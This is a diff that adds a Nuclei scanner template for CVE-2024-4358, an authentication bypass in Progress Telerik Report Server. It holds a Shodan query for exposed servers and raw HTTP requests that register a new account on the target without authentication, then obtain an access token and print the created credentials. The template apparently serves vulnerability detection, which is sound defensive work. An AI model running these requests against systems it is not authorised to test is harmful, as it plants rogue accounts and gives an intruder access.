diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml new file mode 100644 index 0000000000..b2e32509c0 --- /dev/null +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -0,0 +1,64 @@ +id: CVE-2024-4358 + +info: + name: Progress Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 + metadata: + shodan-query: title:"Log in | Telerik Report Server" + verified: true + max-request: 2 + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass'